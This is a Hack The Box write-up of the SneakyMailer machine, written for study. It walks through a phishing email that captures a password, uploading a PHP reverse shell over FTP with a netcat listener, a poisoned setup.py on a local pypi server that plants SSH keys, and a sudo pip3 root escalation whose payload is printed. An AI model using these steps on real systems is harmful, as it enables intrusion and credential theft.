---
title: HTB Sneakymailer
date: 2021-02-18
---


# HTB : SNEAKYMAILER


## Initial Recon

Run nmap for the initial recon : 

```
sudo nmap -sS -sV -sC 10.10.10.197 > rec_ini
```

![](Pictures/rec_ini.png)

The following things can be concluded from here : 

1) vsftpd version 3.0.3 is running on port 21. It is not a vulnerable version</br>
2) ssh runnng on port 22</br>
3) Postfix smtpd is running on port 25</br>
4) A http nginx server is running on port 80</br>
5) imap running on port 143</br>
6) ssl/imap courier is running on port 993</br>
7) A http proxy server is running on port 8080</br>


Let the complete port scan run in the background : 

```
sudo nmap -p- -T5 10.10.10.197 > all_ports
```

![](Pictures/all_ports.png)


Nothing new in the all_ports scan.

## The port 80

When I tried to access the webserver, it turns out to redirect to `http://sneakycorp.htb/`

So add it to /etc/hosts

![](Pictures/web_page.png)

There is also a page team.php, which gives us the usernames and emails of various users.

We can extract them using Beautiful soup.

I wrote the following python code to extract all the emails from the page : 

```
from bs4 import BeautifulSoup

html_file = open('team.php')
soup = BeautifulSoup(html_file,features="lxml")

table = soup.findAll('table')[0]
rows = table.findAll('tr')
creds = []
emails = []
for i in rows: 
    creds.append(i.findAll('td'))
for i in creds[2:]:
    emails.append(i[3].renderContents().decode())
for i in emails:
    print(i)
```

Store the emails in a file : 

```
pyhton3 extract.py > emails
```


To check for the validity of all the email I used `swaks` instead on `smtp-cli` because it is much more easy to use. (Also, I wasn't able to install smtp-cli and swaks was already installed).

This script might help in testing fake mail IDs :   

```
for E in `cat /path/to/email/file`
do
     swaks --to $E --server test-server.example.com --quit-after RCPT --hide-all
     [ $? -ne 0 ] && echo $E
done
```


```
paulbyrd@sneakymailer.htb
```


### Trying a phishing attack??!!!!


I looked on different types of email based phishing attacks. The one thing that they have in common is that, you have to embed a link in the email body. So I found a stackoverflow link, which shows that there is a way to embed a link in the email body in swaks.

https://serverfault.com/questions/846259/how-to-send-a-mail-with-a-url-with-swaks

So I used swaks to send an email to the email ID we got earlier, and embedded my url in it.

```
swaks --to paulbyrd@sneakymailer.htb --from dadurbichi@sneakymailer.htb --server 10.10.10.197 --body '<a href="http://10.10.14.95/">link</a>'
```

I had opened a netcat listener on port 80 :

```
sudo nc -nlvp 80
```

![](Pictures/phishing.png)


```
connect to [10.10.14.95] from (UNKNOWN) [10.10.10.197] 38302
POST /%22%3Elink%3C/a%3E HTTP/1.1
Host: 10.10.14.95
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
```

In the reponse we have the username, email and password as well, which are in url encoded format.

We can use Burpsuite to decode them.

```
firstName=Paul
&
lastName=Byrd &
email=paulbyrd@sneakymailer.htb
&
password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
&
rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
```


## Using the creds on different services

I used the following creds on the differente services : 

```
paulbyrd : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
```

However, these credentials could not be authenticated in the ftp or ssh services. So, we have the IMAP service. </br>
The ports 143 and 993 are both open, which is a good sign that IMAP might be userful.

I tried using the pre-installed Mail client for Parrot ie, Claw Mail, but faced some problems. So I installed Evolution.</br>

In evolution, you can see that there are a couple of sent mails which shows that the username and passwords have been changed : 

![](Pictures/changed_password.png)

```
developer : m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
```


Now on trying the username and password on the ftp server, it logs in successfully.

![](Pictures/ftp_login.png)

Go to the `dev` directory after login in.</br>

## Getting a reverse shell

Here in this directory the php files are there, we can upload our php reverse shell in this directory.

```
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.00 secs (32.9467 MB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 19:52 css
drwxr-xr-x    2 0        0            4096 May 26 19:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 19:52 js
--wxrw-rw-    1 1001     1001         5493 Jul 24 10:58 shell.php
drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
d-wxrw-rw-    2 1001     1001         4096 Jul 24 10:55 upload
drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
d-wxrwxrwx    2 1001     1001         4096 Jul 24 10:02 webshell
226 Directory send OK.
```

Then visit the url `http://dev.sneakymailer.htb/shell.php` because it is on the dev directory of ftp.
But before that add it to /etc/hosts.


```
rlwrap nc -nlvp 1991
```

![](Pictures/shell.png)

We can also login as the developer.

```
su developer
```


Upon running linpeas on the box, we immediately see that there is a hashed password present.


![](Pictures/password_has.png)

```
/var/www/pypi.sneakycorp.htb/.htpasswd:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
```

The password is for the user pypi.

```
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
```

We can crack the password using hashcat or john.


![](Pictures/cracked_pass.png)

```
soufianeelhaoui
```


But it is useless.

Lets check the open ports running on the server

1) Port 5000 is running on the local server</br>
2) 127.0.0.1       localhost pypi.sneakycorp.htb </br>
3) pypi.sneakycorp.htb needs to be added to /etc/hosts</br>

But on trying to access pypi.sneakycorp.htb, it doesn't respond. So I tried looking into port 8080.

This gives us the pypi server : 

![](Pictures/pypi_server.png)

The package index and the simple index can be viewed with the username pypi and password `soufianeelhaoui`


## Exploiting the pypi server

Firstyl it is a pypi server. That means you can install things on it without connecting it to the internet. You can create a fake setup.py script which can include some malicious code, which the pypi server will run with elevated privileges. </br>
So I need to do the following things : 

1) Create a fake `.pypirc` file which points to the local server as the insall source.</br>
2) A `setup.py` file that will contain code, which you want to run and will contain *enough* legitimate code that the installed will run.<br>
3) Modify the home directory, so the the `pypirc` is called before anything else.</br>
4) Then something like : 

```
python3 setup.py sdist register -r local upload -r local
```

Will call the malicious file from the local server.


This is how a .pypirc file looks : https://truveris.github.io/articles/configuring-pypirc/

We can change the username and password we obtained and use it to install our malicious file from the local server.

I changed the `.pypirc` file to something like this :

```
[distutils]
    index-servers=local

[pypi]
  username: torbaba
  password: alskdlaskdjl

[testpypi]
  repository: https://pypi.sneakymailer.htb:8080/
  username: pypi
  password: soufianeelhaoui
```

So that it takes from the local server. <br>
Create your own folder : 

```
mkdir /tmp/test
cd /tmp/test
```

Upload the pypirc file inside that using python http.server. To create a fake setup.py script I got the setup script for the pypi server iself from their github.

I removed the excess part which will not be needed and in the try block included a code which will write my ssh keys to the authorized_keys file on the server.

Upload them to the server and give the required permissions to the files.

After that export the current path to HOME exvironment variable : 

```
export HOME=$(pwd)
````

But before we can do anything we need to activate the python venv. It can be found in the pypi.sneakymailer.htb directory. </br>
We can take a note of this path and use source to activate the python venv.

```
source /var/www/pypi.sneakycorp.htb/venv/bin/activate
```

Then running the above given command will write the ssh keys.


![](Pictures/keys_written.png)

Logging in with this ssh keys will give us the user : 

```
ssh -i id_rsa low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ wc user.txt
 1  1 33 user.txt
low@sneakymailer:~$ 
```

![](Pictures/user.png)



## Root

Executing `sudo -l` we get the following : 

```
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
```

It means that the user can execute pip3 as root. 

![](Pictures/root.png)

Just use GTFO bins to get a shell as root.

```
low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
[sudo] password for low: 
low@sneakymailer:~$ sudo /usr/bin/pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.lLmb92MLVg
# whoami
root
```


